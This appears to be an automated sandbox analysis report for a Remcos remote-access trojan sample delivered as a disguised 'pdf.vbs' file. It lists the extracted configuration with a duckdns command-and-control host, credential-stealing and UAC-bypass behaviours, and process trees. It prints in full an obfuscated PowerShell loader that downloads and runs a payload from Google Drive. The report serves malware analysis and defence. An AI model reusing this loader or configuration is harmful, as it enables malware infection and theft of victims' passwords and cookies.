remcos | 9a551dc7b28ec615c023645b2f7621e5001cc81fcfb7d872983e1f6ad50c71da

Analysis

max time kernel
72s
max time network
125s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
27-11-2024 16:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SOLICITUD DE PRESUPUESTO 27-11-2024·pdf.vbs
Size

33KB
MD5

3ce766fced81c253e1d82f6fb1897fa0
SHA1

b929522021b4a1c40993c0b51ae9c0f9c76cdca2
SHA256

0ba724668ce99b2a3241ff89f4f83a27fdc7225b400d0abe304f00881a2c7be9
SHA512

e9ddfa767da48747a1670755441ca476192500eb352f2b05b449e8a2f4b3553e9be58bdbdd75d9ecf63f6380faad73d512023bc7355e58931bcb47178046e302
SSDEEP

768:qG9asa0h+BjfPK+fNXQhZUQdOPYVVv6Or90T51SQ/I:b9asKBD/fNQ/Dp6Oh0TfzI

Score

10^/10

remcos remotehost collection credential_access discovery evasion execution rat stealer trojan

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

45hq459.duckdns.org:23458

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
true
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-ZP0CQ6
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Detected Nirsoft tools 3 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

Processes:

resource	yara_rule
behavioral1/memory/2248-113-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral1/memory/2472-112-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral1/memory/2184-125-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

Processes:

resource	yara_rule
behavioral1/memory/2472-112-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

Processes:

resource	yara_rule
behavioral1/memory/2248-113-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Blocklisted process makes network request 15 IoCs

Processes:

WScript.exepowershell.exemsiexec.exe

flow	pid	Process
3	1680	WScript.exe
7	1532	powershell.exe
9	1532	powershell.exe
11	1304	msiexec.exe
13	1304	msiexec.exe
15	1304	msiexec.exe
17	1304	msiexec.exe
18	1304	msiexec.exe
20	1304	msiexec.exe
21	1304	msiexec.exe
22	1304	msiexec.exe
23	1304	msiexec.exe
25	1304	msiexec.exe
40	1304	msiexec.exe
41	1304	msiexec.exe

Uses browser remote debugging 2 TTPs 4 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

Processes:

Chrome.exeChrome.exeChrome.exeChrome.exe

pid	Process
1856	Chrome.exe
896	Chrome.exe
884	Chrome.exe
2864	Chrome.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

Processes:

msiexec.exe

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	msiexec.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exe

pid	Process
1532	powershell.exe
2608	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

Processes:

flow	ioc
6	drive.google.com
7	drive.google.com
11	drive.google.com

Drops file in System32 directory 1 IoCs

Processes:

msiexec.exe

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\msiexec.exe	msiexec.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

msiexec.exe

pid	Process
1304	msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exemsiexec.exe

pid	Process
2608	powershell.exe
1304	msiexec.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

msiexec.exe

description	pid	Process	procid_target
PID 1304 set thread context of 2248	1304	msiexec.exe	46
PID 1304 set thread context of 2472	1304	msiexec.exe	47
PID 1304 set thread context of 2184	1304	msiexec.exe	48

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

WScript.exepowershell.exemsiexec.execmd.exereg.exemsiexec.exemsiexec.exemsiexec.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

Chrome.exe

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	Chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Chrome.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

Processes:

reg.exe

pid	Process
2120	reg.exe

Suspicious behavior: EnumeratesProcesses 48 IoCs

Processes:

powershell.exepowershell.exemsiexec.exemsiexec.exeChrome.exe

pid	Process
1532	powershell.exe
2608	powershell.exe
2608	powershell.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
2248	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1856	Chrome.exe
1856	Chrome.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe
2248	msiexec.exe

Suspicious behavior: MapViewOfSection 4 IoCs

Processes:

powershell.exemsiexec.exe

pid	Process
2608	powershell.exe
1304	msiexec.exe
1304	msiexec.exe
1304	msiexec.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

Processes:

powershell.exepowershell.exemsiexec.exeChrome.exe

description	pid	Process
Token: SeDebugPrivilege	1532	powershell.exe
Token: SeDebugPrivilege	2608	powershell.exe
Token: SeDebugPrivilege	2184	msiexec.exe
Token: SeShutdownPrivilege	1856	Chrome.exe
Token: SeShutdownPrivilege	1856	Chrome.exe
Token: SeShutdownPrivilege	1856	Chrome.exe
Token: SeShutdownPrivilege	1856	Chrome.exe
Token: SeShutdownPrivilege	1856	Chrome.exe
Token: SeShutdownPrivilege	1856	Chrome.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

Chrome.exe

pid	Process
1856	Chrome.exe
1856	Chrome.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

msiexec.exe

pid	Process
1304	msiexec.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

WScript.exepowershell.exemsiexec.execmd.exeChrome.exe

description	pid	Process	procid_target
PID 1680 wrote to memory of 1532	1680	WScript.exe	30
PID 1680 wrote to memory of 1532	1680	WScript.exe	30
PID 1680 wrote to memory of 1532	1680	WScript.exe	30
PID 2608 wrote to memory of 1304	2608	powershell.exe	36
PID 2608 wrote to memory of 1304	2608	powershell.exe	36
PID 2608 wrote to memory of 1304	2608	powershell.exe	36
PID 2608 wrote to memory of 1304	2608	powershell.exe	36
PID 2608 wrote to memory of 1304	2608	powershell.exe	36
PID 2608 wrote to memory of 1304	2608	powershell.exe	36
PID 2608 wrote to memory of 1304	2608	powershell.exe	36
PID 2608 wrote to memory of 1304	2608	powershell.exe	36
PID 1304 wrote to memory of 2480	1304	msiexec.exe	38
PID 1304 wrote to memory of 2480	1304	msiexec.exe	38
PID 1304 wrote to memory of 2480	1304	msiexec.exe	38
PID 1304 wrote to memory of 2480	1304	msiexec.exe	38
PID 2480 wrote to memory of 2120	2480	cmd.exe	40
PID 2480 wrote to memory of 2120	2480	cmd.exe	40
PID 2480 wrote to memory of 2120	2480	cmd.exe	40
PID 2480 wrote to memory of 2120	2480	cmd.exe	40
PID 1304 wrote to memory of 1856	1304	msiexec.exe	41
PID 1304 wrote to memory of 1856	1304	msiexec.exe	41
PID 1304 wrote to memory of 1856	1304	msiexec.exe	41
PID 1304 wrote to memory of 1856	1304	msiexec.exe	41
PID 1856 wrote to memory of 316	1856	Chrome.exe	42
PID 1856 wrote to memory of 316	1856	Chrome.exe	42
PID 1856 wrote to memory of 316	1856	Chrome.exe	42
PID 1856 wrote to memory of 1908	1856	Chrome.exe	43
PID 1856 wrote to memory of 1908	1856	Chrome.exe	43
PID 1856 wrote to memory of 1908	1856	Chrome.exe	43
PID 1856 wrote to memory of 1908	1856	Chrome.exe	43
PID 1856 wrote to memory of 1908	1856	Chrome.exe	43
PID 1856 wrote to memory of 1908	1856	Chrome.exe	43
PID 1856 wrote to memory of 1908	1856	Chrome.exe	43
PID 1856 wrote to memory of 1908	1856	Chrome.exe	43
PID 1856 wrote to memory of 1908	1856	Chrome.exe	43
PID 1856 wrote to memory of 1908	1856	Chrome.exe	43
PID 1856 wrote to memory of 1908	1856	Chrome.exe	43
PID 1856 wrote to memory of 1908	1856	Chrome.exe	43
PID 1856 wrote to memory of 1908	1856	Chrome.exe	43
PID 1856 wrote to memory of 1908	1856	Chrome.exe	43
PID 1856 wrote to memory of 1908	1856	Chrome.exe	43
PID 1856 wrote to memory of 1908	1856	Chrome.exe	43
PID 1856 wrote to memory of 1908	1856	Chrome.exe	43
PID 1856 wrote to memory of 1908	1856	Chrome.exe	43
PID 1856 wrote to memory of 1908	1856	Chrome.exe	43
PID 1856 wrote to memory of 1908	1856	Chrome.exe	43
PID 1856 wrote to memory of 1908	1856	Chrome.exe	43
PID 1856 wrote to memory of 1908	1856	Chrome.exe	43
PID 1856 wrote to memory of 1908	1856	Chrome.exe	43
PID 1856 wrote to memory of 1908	1856	Chrome.exe	43
PID 1856 wrote to memory of 1908	1856	Chrome.exe	43
PID 1856 wrote to memory of 1908	1856	Chrome.exe	43
PID 1856 wrote to memory of 1908	1856	Chrome.exe	43
PID 1856 wrote to memory of 1908	1856	Chrome.exe	43
PID 1856 wrote to memory of 1908	1856	Chrome.exe	43
PID 1856 wrote to memory of 1908	1856	Chrome.exe	43
PID 1856 wrote to memory of 1908	1856	Chrome.exe	43
PID 1856 wrote to memory of 1908	1856	Chrome.exe	43
PID 1856 wrote to memory of 1908	1856	Chrome.exe	43
PID 1856 wrote to memory of 1908	1856	Chrome.exe	43
PID 1856 wrote to memory of 1908	1856	Chrome.exe	43
PID 1856 wrote to memory of 1908	1856	Chrome.exe	43
PID 1856 wrote to memory of 1908	1856	Chrome.exe	43
PID 1856 wrote to memory of 1908	1856	Chrome.exe	43

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\SOLICITUD DE PRESUPUESTO 27-11-2024·pdf.vbs"
1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1680
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Skruestikbnk='Piously';;$Fejlskrivningersndsigternes='Coupjhs';;$Fejlskrivningersdeoglyph='Flosserne';;$Phlebolith='Doblon';;$Bobestyrelsers='Overspnde';;$Certificatory=$host.Name;function Skatten($jokesome){If ($Certificatory) {$Sakristis=4} for ($Fejlskrivningers=$Sakristis;;$Fejlskrivningers+=5){if(!$jokesome[$Fejlskrivningers]) { break }$Mistonusk+=$jokesome[$Fejlskrivningers]}$Mistonusk}function Drmaatten($Sydforhngs){ .($Fljlsbld) ($Sydforhngs)}$Ofrede=Skatten 'Bowdn B ueVejst Ska.SubowBlomELystBHatbC,rakLUdski kkveTeakNHum T';$Cycadeous=Skatten ' GalMAfs.o Beaz,tiliS bdl vel HaraForb/';$biografteaters=Skatten ' gteTK.ndl Strs sid1Scie2';$Bevgelsesenergi='Ceci[Tr knFrigeFr mTalan.GalvS lenEAli.REnacVTeraIExpoCQuodeA idpSkruoStraiFo mnSkivtK nvmH xaaSt eN Bosa hopgLysfeAno rNo.o] Ani: Sl : ncosUblee Supc MoruMul rZinkI.aseTF jlyFetcpArbeRGraaoDa btShinoInfrc S.bO omeLUnpr=Ke t$GlycbQ inIAt.mo RingSla,RUdenAKon FKafftskrieChiraIsoiTNonrE S prT abs';$Cycadeous+=Skatten 'Caut5Roke.R,nd0Inve Udv(MammWWelfiStymn Impd Fo,oDykswBe esad a B blNOptoTBuil Plet1 Com0Obl .Wine0Sini;Tumb AarhWMatriAftenE bl6Disu4Ligu;Br m P ndxTved6S gn4Fors; Atr Teler emivPris:Unmy1 Kva3 Mal1Supe. Oph0Da.b)Good KontGSt.me BilcVelmkForlo Spa/Resi2Cloa0V nd1Homo0 Kn 0Muta1skin0 ti1Stat IntiF onai ovrKo.ieRoh fMellouv.lxakki/Untr1Hulk3Udsk1Kon .Rehu0';$Sandburg=Skatten 'TorqUMetasPenee aniRFili- detap omGGoatE BulnMi it';$Fischerite=Skatten ' Tumh enetPo ttOmsppPanasU de:ko r/i fr/Po ldHrecrvaabiSem,v olueappo.MantgSu bo M roFordg F slPh se Hov.Fr.mc secoVindmvold/ Fisu antcFlak?FauveCerexPreepgaaroR dirCaultblot=T,lndUn ooBe,mw CarnTabulkorro lutaElemd d,f& idti lavd alo= Gor1SlumUBrusA rbe_En,bUGolf9 BlozBecrQIwa qn nrhMexiB R gEGeomBQuinUPaja3 jerxBrodE,utuVSmrr2Im orEfteRPronILivorBissxMandeafhec OriVPargL rnA TregLyserKonsiMovi0';$Opsaetning=Skatten 'A.mi>';$Fljlsbld=Skatten 'Af,eIBl keRi gx';$Agterspejlenes='Yorgos56';$Outfinding='\Relativizes.Bro';Drmaatten (Skatten ' pse$ DanGM.gnL Flao calBPaneaRaadLInte:Hftepe eaOA belStanYPorto R grGraeCKalkHUnpoIBrkksRi,sMCram=Sprl$Preje BegNTillVNo f: TidASat p onpNemaDViseaDompTStemAMega+Scre$Nordo t,luF evT Un,fBlaaIIndsNChapd BaniAna nRottg');Drmaatten (Skatten 'Unfr$LivaG.fval.vidONu zBUlykaadnoL oms:,charUndeOTrosT BisFFemgm PitRTrec=Alle$Kom F ambiG isSd ejCMat HEllee emoRKrl IbrnetFremEWal..eurysAlkoPTravLBundI,emttTest(Flor$ Ke o KonP Sp sTitaaMisoeCitoT VikNDenoi,tannBonegBroc)');Drmaatten (Skatten $Bevgelsesenergi);$Fischerite=$Rotfmr[0];$Superillustrated=(Skatten 'Nive$ukvegPolilTr sOSkdebTa.wAJobsLA va:,logP kaO rkiL Le A,nteKBefokudske OrtN GlasA,di=VillnPr,seBegrWseng-PaleoByplBJun jCh rE TelCForeTIndr FrubSAfvrY Ae.s ntTBgenEblodMDesc.Brom$Gun OMejefEskirlystEMennDChasE');Drmaatten ($Superillustrated);Drmaatten (Skatten 'Galv$Un,epPropoda hl FreaVanhk BjekOvere Te.nStabsKart.LatiH UnpetauraHavedTempeSilkreva sBli [Indi$UnwrSTempa L.tnRe.vdC ntbNonvuPol,rVgtegLand] Nar= S r$Li.eCHepty stcRegraEn.rdLe.oe,iddoOutcuUnfis');$Kapitalvrdiens=Skatten ' M m$DanspUdslochefl esaFermkSem,kGamgeCr nn No.sDvbl. SpaDomlaoKollwMi rnForfl laso M yaTrimd dlbFPerci U.clN gleGram(gast$B deFFunki Da sarbecSuffhSalge Strr veiTroltBageeEgen,Orfg$S,uiGComoe Or n R heWa,trpreca Ma l K tkRevioRuskm OrtaImpenS,umd,ampoHa be QuinVink)';$Generalkomandoen=$Polyorchism;Drmaatten (Skatten 'Vand$LidlgDes lLocaoaffaBSterAF tuLfire: AsyuAttrn PlepKompuMa.rNEvoccAutotPetrA.egeTChicEComp=A,al(ValvtlarrECaptSDepeTUnr -NonipUnbeaInd.TP sihPree Trai$ShebgO sle.nbuN TraEOmvar.hmeAUncalc,ryKCounoAnteMFronaRetsnPrinDM looMi,reUnwinHell)');while (!$Unpunctate) {Drmaatten (Skatten 'Over$R bsg Aktl NonoSamlbCogna ArilFrit: DraDGango Kulc Mode Apon Rygt igauJellr hipeEschtV rasVari= Hum$hydrPGourrDbefe ogaAfbilS,umlTranuLatesSomeiTennoSlukn') ;Drmaatten $Kapitalvrdiens;Drmaatten (Skatten 'Mu,ts Er,TSpdbA,rhvrEntotBreg-NonsS.ssyLStilE Na EUnreP Cai sy 4');Drmaatten (Skatten 'Ava $Sankg allLBiblo.nklB HoraFe lLB gg:TileU,litNPur P TopU,nidnPliocRelit Br ADeletF brEArc =Uncr(,ntiTS,enE Reps orTQual-ApacpRentA ,ktTNocthPist Mtaa$ hloG In e DennProtEAkseRectoa kepLEncokf rboBletMUlo,aSgeknHypodMal,Osynke Bogn Ana)') ;Drmaatten (Skatten ' .nm$R,peGheadlAmpaoKl nB De aHer L Mon: ArcM.ilrIHingSSp rDPhotiM toSUnretAlpeIForsn CogG R.nu,ermiKv,dsNeedHTorn=Sil,$CrumGAntyl BeboSp tBTuriAGonalTour: orss.oppoFarrRFrdirTreaoRetaw ApplM,ddENd.tsIdensDarklFlioYGard3Logi2K sk+S oo+Skra%Like$nyttR.usio,nert.egefResemBiogRb,ko.,ejscUnseoCapaUKuvenRekvT') ;$Fischerite=$Rotfmr[$Misdistinguish]}$Fangelejrens=299518;$tyndstegens=30645;Drmaatten (Skatten 'Lr.r$ anggGouslTraaoIncaB djuapsilL.imo:chelUR.drNZinci NonT.nprER peAr,cib UtoIFileLKit iOverTsambY aps C,an=tape Concg rieDexttGyps-AeroCFartoUdm.n onsTWillePetrn StatNedf Kol$CorkgValkehderNAdopE ubsrReseAV.adLmindK S hoTankm idea uldnUn wDSmrfoPy oERdden');Drmaatten (Skatten 'Tryk$PoncgMagilProto L.vbsynda,jvll ce:S raKMonsa shrr Dg,lPervsA.givDeleoPaamgbecrnTrepeReflnU lusPomf Tot=Ford Udma[ c,yS Un y AucsK zatConte RekmMicr.MadpC FouoErhvn AlmvFormecounrEquitOphi]Liba:Kle : troF SamrP.anoW ltmImpeBDksmaEntrsFordeP st6Drap4F.gbSDowntBestrPolsiHoofnL rtgAffl(Endo$NonauUnbinG asiKnebtMeoseRiciaSprubEndoiMikrlPerri.rnutTitryKoll)');Drmaatten (Skatten 'Twen$SubsGu,eqlToldoRecob TidaB siLMill:V,evb Smre UndHTuria HavN,munDL.ndl riIBe eNIdeaGAngrsgudeMSe.eUOrdnl iddiS riGPec hNonreMousdS,utE,remRJu i Air=Ford Symb[KaalS I gyUncoS StotsujeEFo kmno.f.S vfTPrefEord.x KicTPlig. esaERu rnCartC D.soLiflDRe rI GlenSol.G oci] He : Ele: StiAbesks urvC quai HaaICumi. G aGRegnEJamrtNonpS nttM ljr F eIMetanSlidG Gen(Ordv$Scirk KolaDedirBrodlCondsEamoVTungORekvg isnHgtneh lintransUnde)');Drmaatten (Skatten 'Pala$DiblGUddeLNicooStorbFa eabedfL un:FrdiISandnReckdhanhERamrfFelseJosen Ki s alvIPilgBRaahLKnneET afNSnipEBaroSBrygS Ije=Osti$ isbB ForEMarkHPimpABar NUheldKaf,LPaneI WroN lobg,esis CowmSaddUMenil hemI KejgDusehInkweBlaaDBusieSpytr For.be.zSkognU Trub Co S NicTSm rrEfteInurtn B lg .ta(Bold$C.effRaa,aSvklNKlpugFortEPr.ilSlove Ra.jDiskRForseMedbnBlseS ,an, Kar$Gis,TBio y inlNInstdAllesForbT,tbeeVerbg ExoE MonNMedbSargu)');Drmaatten $Indefensibleness;"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1532

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Skruestikbnk='Piously';;$Fejlskrivningersndsigternes='Coupjhs';;$Fejlskrivningersdeoglyph='Flosserne';;$Phlebolith='Doblon';;$Bobestyrelsers='Overspnde';;$Certificatory=$host.Name;function Skatten($jokesome){If ($Certificatory) {$Sakristis=4} for ($Fejlskrivningers=$Sakristis;;$Fejlskrivningers+=5){if(!$jokesome[$Fejlskrivningers]) { break }$Mistonusk+=$jokesome[$Fejlskrivningers]}$Mistonusk}function Drmaatten($Sydforhngs){ .($Fljlsbld) ($Sydforhngs)}$Ofrede=Skatten 'Bowdn B ueVejst Ska.SubowBlomELystBHatbC,rakLUdski kkveTeakNHum T';$Cycadeous=Skatten ' GalMAfs.o Beaz,tiliS bdl vel HaraForb/';$biografteaters=Skatten ' gteTK.ndl Strs sid1Scie2';$Bevgelsesenergi='Ceci[Tr knFrigeFr mTalan.GalvS lenEAli.REnacVTeraIExpoCQuodeA idpSkruoStraiFo mnSkivtK nvmH xaaSt eN Bosa hopgLysfeAno rNo.o] Ani: Sl : ncosUblee Supc MoruMul rZinkI.aseTF jlyFetcpArbeRGraaoDa btShinoInfrc S.bO omeLUnpr=Ke t$GlycbQ inIAt.mo RingSla,RUdenAKon FKafftskrieChiraIsoiTNonrE S prT abs';$Cycadeous+=Skatten 'Caut5Roke.R,nd0Inve Udv(MammWWelfiStymn Impd Fo,oDykswBe esad a B blNOptoTBuil Plet1 Com0Obl .Wine0Sini;Tumb AarhWMatriAftenE bl6Disu4Ligu;Br m P ndxTved6S gn4Fors; Atr Teler emivPris:Unmy1 Kva3 Mal1Supe. Oph0Da.b)Good KontGSt.me BilcVelmkForlo Spa/Resi2Cloa0V nd1Homo0 Kn 0Muta1skin0 ti1Stat IntiF onai ovrKo.ieRoh fMellouv.lxakki/Untr1Hulk3Udsk1Kon .Rehu0';$Sandburg=Skatten 'TorqUMetasPenee aniRFili- detap omGGoatE BulnMi it';$Fischerite=Skatten ' Tumh enetPo ttOmsppPanasU de:ko r/i fr/Po ldHrecrvaabiSem,v olueappo.MantgSu bo M roFordg F slPh se Hov.Fr.mc secoVindmvold/ Fisu antcFlak?FauveCerexPreepgaaroR dirCaultblot=T,lndUn ooBe,mw CarnTabulkorro lutaElemd d,f& idti lavd alo= Gor1SlumUBrusA rbe_En,bUGolf9 BlozBecrQIwa qn nrhMexiB R gEGeomBQuinUPaja3 jerxBrodE,utuVSmrr2Im orEfteRPronILivorBissxMandeafhec OriVPargL rnA TregLyserKonsiMovi0';$Opsaetning=Skatten 'A.mi>';$Fljlsbld=Skatten 'Af,eIBl keRi gx';$Agterspejlenes='Yorgos56';$Outfinding='\Relativizes.Bro';Drmaatten (Skatten ' pse$ DanGM.gnL Flao calBPaneaRaadLInte:Hftepe eaOA belStanYPorto R grGraeCKalkHUnpoIBrkksRi,sMCram=Sprl$Preje BegNTillVNo f: TidASat p onpNemaDViseaDompTStemAMega+Scre$Nordo t,luF evT Un,fBlaaIIndsNChapd BaniAna nRottg');Drmaatten (Skatten 'Unfr$LivaG.fval.vidONu zBUlykaadnoL oms:,charUndeOTrosT BisFFemgm PitRTrec=Alle$Kom F ambiG isSd ejCMat HEllee emoRKrl IbrnetFremEWal..eurysAlkoPTravLBundI,emttTest(Flor$ Ke o KonP Sp sTitaaMisoeCitoT VikNDenoi,tannBonegBroc)');Drmaatten (Skatten $Bevgelsesenergi);$Fischerite=$Rotfmr[0];$Superillustrated=(Skatten 'Nive$ukvegPolilTr sOSkdebTa.wAJobsLA va:,logP kaO rkiL Le A,nteKBefokudske OrtN GlasA,di=VillnPr,seBegrWseng-PaleoByplBJun jCh rE TelCForeTIndr FrubSAfvrY Ae.s ntTBgenEblodMDesc.Brom$Gun OMejefEskirlystEMennDChasE');Drmaatten ($Superillustrated);Drmaatten (Skatten 'Galv$Un,epPropoda hl FreaVanhk BjekOvere Te.nStabsKart.LatiH UnpetauraHavedTempeSilkreva sBli [Indi$UnwrSTempa L.tnRe.vdC ntbNonvuPol,rVgtegLand] Nar= S r$Li.eCHepty stcRegraEn.rdLe.oe,iddoOutcuUnfis');$Kapitalvrdiens=Skatten ' M m$DanspUdslochefl esaFermkSem,kGamgeCr nn No.sDvbl. SpaDomlaoKollwMi rnForfl laso M yaTrimd dlbFPerci U.clN gleGram(gast$B deFFunki Da sarbecSuffhSalge Strr veiTroltBageeEgen,Orfg$S,uiGComoe Or n R heWa,trpreca Ma l K tkRevioRuskm OrtaImpenS,umd,ampoHa be QuinVink)';$Generalkomandoen=$Polyorchism;Drmaatten (Skatten 'Vand$LidlgDes lLocaoaffaBSterAF tuLfire: AsyuAttrn PlepKompuMa.rNEvoccAutotPetrA.egeTChicEComp=A,al(ValvtlarrECaptSDepeTUnr -NonipUnbeaInd.TP sihPree Trai$ShebgO sle.nbuN TraEOmvar.hmeAUncalc,ryKCounoAnteMFronaRetsnPrinDM looMi,reUnwinHell)');while (!$Unpunctate) {Drmaatten (Skatten 'Over$R bsg Aktl NonoSamlbCogna ArilFrit: DraDGango Kulc Mode Apon Rygt igauJellr hipeEschtV rasVari= Hum$hydrPGourrDbefe ogaAfbilS,umlTranuLatesSomeiTennoSlukn') ;Drmaatten $Kapitalvrdiens;Drmaatten (Skatten 'Mu,ts Er,TSpdbA,rhvrEntotBreg-NonsS.ssyLStilE Na EUnreP Cai sy 4');Drmaatten (Skatten 'Ava $Sankg allLBiblo.nklB HoraFe lLB gg:TileU,litNPur P TopU,nidnPliocRelit Br ADeletF brEArc =Uncr(,ntiTS,enE Reps orTQual-ApacpRentA ,ktTNocthPist Mtaa$ hloG In e DennProtEAkseRectoa kepLEncokf rboBletMUlo,aSgeknHypodMal,Osynke Bogn Ana)') ;Drmaatten (Skatten ' .nm$R,peGheadlAmpaoKl nB De aHer L Mon: ArcM.ilrIHingSSp rDPhotiM toSUnretAlpeIForsn CogG R.nu,ermiKv,dsNeedHTorn=Sil,$CrumGAntyl BeboSp tBTuriAGonalTour: orss.oppoFarrRFrdirTreaoRetaw ApplM,ddENd.tsIdensDarklFlioYGard3Logi2K sk+S oo+Skra%Like$nyttR.usio,nert.egefResemBiogRb,ko.,ejscUnseoCapaUKuvenRekvT') ;$Fischerite=$Rotfmr[$Misdistinguish]}$Fangelejrens=299518;$tyndstegens=30645;Drmaatten (Skatten 'Lr.r$ anggGouslTraaoIncaB djuapsilL.imo:chelUR.drNZinci NonT.nprER peAr,cib UtoIFileLKit iOverTsambY aps C,an=tape Concg rieDexttGyps-AeroCFartoUdm.n onsTWillePetrn StatNedf Kol$CorkgValkehderNAdopE ubsrReseAV.adLmindK S hoTankm idea uldnUn wDSmrfoPy oERdden');Drmaatten (Skatten 'Tryk$PoncgMagilProto L.vbsynda,jvll ce:S raKMonsa shrr Dg,lPervsA.givDeleoPaamgbecrnTrepeReflnU lusPomf Tot=Ford Udma[ c,yS Un y AucsK zatConte RekmMicr.MadpC FouoErhvn AlmvFormecounrEquitOphi]Liba:Kle : troF SamrP.anoW ltmImpeBDksmaEntrsFordeP st6Drap4F.gbSDowntBestrPolsiHoofnL rtgAffl(Endo$NonauUnbinG asiKnebtMeoseRiciaSprubEndoiMikrlPerri.rnutTitryKoll)');Drmaatten (Skatten 'Twen$SubsGu,eqlToldoRecob TidaB siLMill:V,evb Smre UndHTuria HavN,munDL.ndl riIBe eNIdeaGAngrsgudeMSe.eUOrdnl iddiS riGPec hNonreMousdS,utE,remRJu i Air=Ford Symb[KaalS I gyUncoS StotsujeEFo kmno.f.S vfTPrefEord.x KicTPlig. esaERu rnCartC D.soLiflDRe rI GlenSol.G oci] He : Ele: StiAbesks urvC quai HaaICumi. G aGRegnEJamrtNonpS nttM ljr F eIMetanSlidG 